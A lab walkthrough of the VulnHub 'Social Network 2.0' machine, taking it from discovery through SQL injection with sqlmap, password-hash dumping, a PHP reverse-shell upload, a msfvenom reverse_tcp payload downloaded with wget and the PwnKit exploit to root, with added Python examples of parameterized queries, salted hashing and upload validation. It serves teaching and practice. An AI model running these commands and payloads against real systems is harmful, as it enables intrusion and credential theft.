Socnet
Author: jason huawen
Target information
Name: BoredHackerBlog: Social Network 2.0
URL: https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/
Identifying the target host's IP address
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:26:b1:cb      1      60  PCS Systemtechnik GmbH
 192.168.56.169  08:00:27:5b:b3:1b      1      60  PCS Systemtechnik GmbH
```
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.169.
Nmap scan
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
|   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
|_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Social Network
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
|_http-title: Error response
MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
```
The Nmap scan shows that the target has three open ports: 22 (ssh), 80 (http) and 8000 (http).
Getting a shell
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.169
+ Target Hostname:    192.168.56.169
+ Target Port:        80
+ Start Time:         2023-04-22 22:00:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2023-04-22 22:01:42 (GMT-4) (63 seconds)
---------------------------------------------------------------------------
```
The /database/ directory contains two .sql files; download them to the local machine.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ cat DML.sql
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");
```
The INSERT statements list a user_password column but supply no password value, which is a little odd.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
/.html                (Status: 403) [Size: 294]
/index.php            (Status: 200) [Size: 10609]
/search.php           (Status: 302) [Size: 1490] [--> index.php]
/home.php             (Status: 302) [Size: 4234] [--> index.php]
/resources            (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
/profile.php          (Status: 302) [Size: 2845] [--> index.php]
/data                 (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
/friends.php          (Status: 302) [Size: 1669] [--> index.php]
/database             (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/functions            (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
/requests.php         (Status: 302) [Size: 1719] [--> index.php]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1322305 / 1323366 (99.92%)
===============================================================
```
Gobuster did not turn up anything of value.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ curl http://192.168.56.169:8000/
<head>
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code 501.
<p>Message: Unsupported method ('GET').
<p>Error code explanation: 501 = Server does not support this operation.
</body>
```
GET is not supported? Then intercept the request with Burp Suite and change the method to POST.
But the response is empty, with no content at all.
Scan port 8000 with Gobuster as well, using the -m parameter to set the request method.
Register a new user and log in. There is a search function that looks like it may be vulnerable to SQL injection; intercept the request with Burp Suite and save it to a file.
http://192.168.56.169/search.php?location=emails&query=test
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3
```
Testing confirms that the target is vulnerable to SQL injection.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] socialnetwork
[*] sys
```
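The injection in search.php above comes from user input being spliced into the SQL text. The following is an added illustration, not code from the writeup or from the Social Network 2.0 application (whose PHP source is not on the page, so the vulnerable shape is an assumption). It uses Python and sqlite3 as a stand-in for the PHP/MySQL search: the table columns follow the sqlmap output, the rows are constructed sample data, and the hardened version resolves the `location` parameter through an allowlist (column names cannot be bound as parameters) and binds the `query` value with a placeholder.

```python
import sqlite3

# Column names follow the sqlmap --columns output for socialnetwork.users; the rows are
# constructed sample data (names from the page's DML.sql, placeholder password values).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_firstname TEXT, "
        "user_lastname TEXT, user_email TEXT, user_password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (user_firstname, user_lastname, user_email, user_password) "
        "VALUES (?, ?, ?, ?)",
        [
            ("Armin", "Virgil", "armin@gmail.com", "<placeholder-hash>"),
            ("Paul", "James", "paul@gmail.com", "<placeholder-hash>"),
            ("Chris", "Wilson", "chris@gmail.com", "<placeholder-hash>"),
        ],
    )
    return conn

# The 'location' request parameter selects a column. Identifiers cannot be bound as SQL
# parameters, so both versions map it through a fixed allowlist (assumed mapping).
LOCATIONS = {"emails": "user_email", "names": "user_firstname"}

def search_vulnerable(conn, location, query):
    """Assumed shape of the flaw: the query string is pasted straight into the SQL text."""
    column = LOCATIONS[location]
    sql = "SELECT user_email FROM users WHERE " + column + " LIKE '%" + query + "%'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, location, query):
    """Hardened version: allowlisted column, LIKE pattern passed as a bound parameter."""
    column = LOCATIONS.get(location)
    if column is None:
        raise ValueError("unknown search location: %r" % location)
    # Escape LIKE wildcards coming from the user so '%' and '_' match literally.
    escaped = query.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT user_email FROM users WHERE " + column + " LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]

if __name__ == "__main__":
    conn = build_db()
    probe = "' OR '1'='1"   # tautology: turns the WHERE clause into match-everything
    print("vulnerable:", search_vulnerable(conn, "emails", probe))   # every row
    print("safe:      ", search_safe(conn, "emails", probe))         # []
    print("wildcard:  ", search_vulnerable(conn, "emails", "_"), search_safe(conn, "emails", "_"))
```

Binding the value is what removes the injection; the ESCAPE clause is a separate, smaller fix so that a lone `_` or `%` from the user does not silently behave as a wildcard and enumerate the whole table.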
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork --tables
Database: socialnetwork
[4 tables]
+------------+
| friendship |
| posts      |
| user_phone |
| users      |
+------------+
```
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columns
Database: socialnetwork
Table: users
[11 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| user_about     | text         |
| user_birthdate | date         |
| user_email     | varchar(255) |
| user_firstname | varchar(20)  |
| user_gender    | char(1)      |
| user_hometown  | varchar(255) |
| user_id        | int(11)      |
| user_lastname  | varchar(20)  |
| user_nickname  | varchar(20)  |
| user_password  | varchar(255) |
| user_status    | char(1)      |
+----------------+--------------+
```
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dump
Table: users
[3 entries]
+------------------------+----------------------------------+
| user_email             | user_password                    |
+------------------------+----------------------------------+
| admin@localhost.com    | 21232f297a57a5a743894a0e4a801fc3 |
| testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 |
| test@test.com          | e10adc3949ba59abbe56e057f20f883e |
+------------------------+----------------------------------+
```
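The dumped values are 32 hex characters with no salt, i.e. plain MD5, which is why an online lookup resolves them instantly. As an added example that is not part of the writeup, the block below audits the dump against a short constructed list of trivial candidates (it recovers admin for admin@localhost.com, as the page states, and 123456 for test@test.com) and then shows what the application should have stored instead: a per-user random salt with an iterated PBKDF2-HMAC-SHA256 digest and a constant-time comparison. The `algo$iterations$salt$hash` storage string is this example's own format, not the application's.

```python
import hashlib
import hmac
import os

# The three hashes exactly as dumped from socialnetwork.users on the page.
DUMPED = {
    "admin@localhost.com": "21232f297a57a5a743894a0e4a801fc3",
    "testuser@localhost.com": "5d9c68c6c50ed3d02a2fcf54f63993b6",
    "test@test.com": "e10adc3949ba59abbe56e057f20f883e",
}

# Constructed list of trivial values a password-storage audit tries first.
WEAK_CANDIDATES = ["admin", "password", "123456", "test", "letmein"]

def identify_unsalted_md5(hex_digest, candidates=WEAK_CANDIDATES):
    """Return the candidate whose plain MD5 equals hex_digest, or None if none matches."""
    for candidate in candidates:
        if hashlib.md5(candidate.encode("utf-8")).hexdigest() == hex_digest:
            return candidate
    return None

def audit_dump(dumped):
    """Map each account to the weak value its hash reveals (None when not in the list)."""
    return {email: identify_unsalted_md5(digest) for email, digest in dumped.items()}

# 600,000 is the OWASP Password Storage Cheat Sheet minimum for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000

def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated hash in an 'algo$iterations$salt$hash' string (this example's own format)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format: %r" % algo)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for email, weak in audit_dump(DUMPED).items():
        print(email, "->", weak if weak else "not in candidate list")
    stored = hash_password("admin")
    print(stored)
    print(verify_password("admin", stored), verify_password("Admin", stored))
```

Because the salt is random, two calls to `hash_password("admin")` produce different strings, so a leaked table no longer reveals which accounts share a password and cannot be resolved with a precomputed lookup.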
Looking the hashes up on an online site gives admin as the password for admin@localhost.com. Login succeeds, and the profile page allows image uploads, so let's see whether shell.php can be uploaded.
There is no filtering at all: shell.php uploads successfully, and the reverse shell from the target comes back.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 02:40:11 up 47 min,  0 users,  load average: 0.05, 0.31, 0.75
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@socnet2:/$ cd /home
cd /home
www-data@socnet2:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Oct 29  2018 .
drwxr-xr-x 25 root   root   4.0K Oct 29  2018 ..
drwxr-xr-x  6 socnet socnet 4.0K Oct 29  2018 socnet
```
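The profile-picture upload accepted shell.php because nothing checked the file. The following is an added example, not code from the writeup or from the application (its upload handler is not on the page), showing in Python the checks a server-side upload handler needs: a size cap, an extension allowlist on the client name, a content check against real image signatures, a defence-in-depth refusal of PHP open tags inside otherwise valid images, and a server-generated random filename whose extension comes from the detected content rather than from the client. The signature list and size limit are assumptions chosen for the example.

```python
import os
import secrets

# Leading bytes of the image formats a profile-picture upload should accept (assumed policy).
IMAGE_MAGIC = [
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
]
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024   # assumed limit for an avatar

class UploadRejected(ValueError):
    """Raised with a reason string when an upload fails validation."""

def detect_image_type(data):
    """Return the extension matching the content's signature, or None."""
    for magic, ext in IMAGE_MAGIC:
        if data.startswith(magic):
            return ext
    return None

def validate_upload(client_filename, data):
    """Return a server-chosen filename for an accepted image, or raise UploadRejected.

    The client-supplied name is used only for a coarse extension check. It is never
    reused as the stored name, so neither 'shell.php' nor a path embedded in the name
    can land in the web root under a name the web server would hand to PHP.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed: %r" % ext)
    detected = detect_image_type(data)
    if detected is None:
        raise UploadRejected("content does not start with a known image signature")
    # Defence in depth against image/PHP polyglots: a real avatar never carries a PHP tag.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP tag")
    # Random name; the extension follows the detected type, not the client's claim.
    return secrets.token_hex(16) + detected

def is_accepted(client_filename, data):
    """Boolean wrapper around validate_upload for quick checks."""
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False

if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header padded with zeros, and a harmless PHP snippet.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    php = b"<?php echo 1; ?>"
    print("avatar.png / PNG bytes   ->", validate_upload("avatar.png", png))
    print("shell.php / PHP bytes    ->", is_accepted("shell.php", php))
    print("shell.png / PHP bytes    ->", is_accepted("shell.png", php))
    print("avatar.png / PNG + PHP   ->", is_accepted("avatar.png", png + php))
```

Store the returned name in a directory that the web server serves as static content only (no PHP handler mapped there), and keep the mapping from user to filename in the database; that way the extension check is only one of several layers rather than the single line of defence the original upload evidently lacked.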
Privilege escalation
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
```
After generating the payload, upload it to the /tmp directory on the target.
```
www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-23 02:55:00--  http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s

2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]

www-data@socnet2:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
```
Running the file yields a Meterpreter session; then use the local exploit suggester to locate modules that can escalate privileges.
```
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.169 - Collecting local exploits for x86/linux...
[*] 192.168.56.169 - 167 exploit checks are being tried...
[+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.169 - Valid modules for session 1:
============================

 #   Name                                                  Potentially Vulnerable?  Check Result
 -   ----                                                  -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec   Yes                      The target is vulnerable.
```
```
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   x86_64

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dmofmj
[+] The target is vulnerable.
[*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.ebvnqpec
[*] Sending stage (3020772 bytes) to 192.168.56.169
[+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
[+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
[+] Deleted /tmp/.ebvnqpec
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400

meterpreter > shell
Process 1899 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 32K
drwx------  4 root root 4.0K Oct 29  2018 .
drwxr-xr-x 25 root root 4.0K Oct 29  2018 ..
-rw-------  1 root root    5 Oct 29  2018 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Oct 29  2018 .local
-rw-------  1 root root  128 Oct 29  2018 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 29  2018 .ssh
```
With that we have a root shell and the root flag.